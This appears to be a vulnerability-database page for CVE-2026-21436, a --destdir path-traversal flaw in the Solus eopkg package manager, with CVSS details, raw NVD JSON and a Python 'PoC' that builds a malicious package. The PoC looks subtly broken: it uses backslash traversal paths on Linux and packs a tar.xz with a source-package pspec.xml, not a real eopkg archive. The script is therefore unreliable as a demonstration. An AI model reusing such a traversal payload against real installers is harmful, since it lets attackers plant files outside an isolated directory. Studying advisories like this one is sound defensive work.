Security Vulnerability Report
中文
CVE-2026-21436 CVSS 5.5 MEDIUM

CVE-2026-21436

Published: 2026-01-01 18:15:41
Last Modified: 2026-03-04 21:33:15
Source: [email protected]

Description

eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could escape the directory set by `--destdir`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be installed in the path given by `--destdir`, but on a different location on the host. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:getsol:eopkg:*:*:*:*:*:python:*:* - VULNERABLE
eopkg < 4.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2026-21436 PoC - Malicious eopkg package with path traversal # This PoC demonstrates how a malicious package can escape --destdir import os import tarfile import tempfile def create_malicious_package(): """Create a malicious eopkg package with path traversal payload""" # Create package directory structure pkg_dir = tempfile.mkdtemp() install_dir = os.path.join(pkg_dir, 'install') os.makedirs(install_dir) # Create malicious file that will escape destdir # Using path traversal to write outside destdir malicious_filename = "..\\..\\..\\..\\..\\tmp\\malicious_script.sh" malicious_path = os.path.join(install_dir, malicious_filename) with open(malicious_path, 'w') as f: f.write("#!/bin/bash\n") f.write("# Malicious payload - escalate privileges or execute code\n") f.write("echo 'PWNED' > /tmp/pwned.txt\n") # Create package metadata (pspec.xml) pspec_content = '''<?xml version="1.0"?> <Package name="malicious-package" version="1.0" summary="Malicious package"> <Maintainer>Attacker <[email protected]></Maintainer> <License>GPL-3.0</License> <IsSourcePackage>false</IsSourcePackage> <History> <Update release="1"> <Date>2026-01-01</Date> <Version>1.0</Version> <Comment>Initial release</Comment> </Update> </History> <Sources> <File type="local" path="malicious-package-1.0.tar.xz"/> </Sources> </Package> ''' with open(os.path.join(pkg_dir, 'pspec.xml'), 'w') as f: f.write(pspec_content) # Create eopkg archive output_pkg = 'malicious-package-1.0.eopkg' with tarfile.open(output_pkg, 'w:xz') as tar: tar.add(pkg_dir, arcname='.') print(f"[+] Created malicious package: {output_pkg}") print(f"[+] Package contains: {malicious_filename}") print(f"[+] When installed with --destdir=/tmp/dest, file will escape to /tmp/malicious_script.sh") return output_pkg def simulate_attack(): """Simulate the attack scenario""" print("=" * 60) print("CVE-2026-21436 Attack Simulation") print("=" * 60) print("\n[!] Attack Prerequisites:") print(" 1. Attacker controls package source or compromises repository") print(" 2. Victim installs package from attacker's source") print(" 3. Victim uses --destdir to isolate installation") print("\n[!] Attack Steps:") print(" 1. Attacker creates malicious package with path traversal in filenames") print(" 2. Victim: eopkg install --destdir=/tmp/isolated malicious.eopkg") print(" 3. Files escape /tmp/isolated to /tmp/malicious_script.sh") print(" 4. Attacker achieves code execution or system compromise") print("\n[+] Mitigation: Upgrade to eopkg >= 4.4.0") if __name__ == "__main__": create_malicious_package() simulate_attack()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21436", "sourceIdentifier": "[email protected]", "published": "2026-01-01T18:15:41.203", "lastModified": "2026-03-04T21:33:14.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could escape the directory set by `--destdir`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be installed in the path given by `--destdir`, but on a different location on the host. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected."}, {"lang": "es", "value": "eopkg es un gestor de paquetes de Solus implementado en python3. En versiones anteriores a la 4.4.0, un paquete malicioso podría escapar del directorio establecido por `--destdir`. Esto requiere la instalación de un paquete de una fuente maliciosa o comprometida. Los archivos en dichos paquetes no se instalarían en la ruta especificada por `--destdir`, sino en una ubicación diferente en el host. El problema ha sido solucionado en la v4.4.0. Los usuarios que solo instalan paquetes de los repositorios de Solus no se ven afectados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:A/VC:N/VI:H/VA:N/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getsol:eopkg:*:*:*:*:*:python:*:*", "versionEndExcluding": "4.4.0", "matchCriteriaId": "1E0EA986-0572-494D-A971-C2071C7E153A"}]}]}], "references": [{"url": "https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/getsolus/eopkg/pull/201", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/getsolus/eopkg/releases/tag/v4.4.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/getsolus/eopkg/security/advisories/GHSA-786v-47cq-qm6m", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.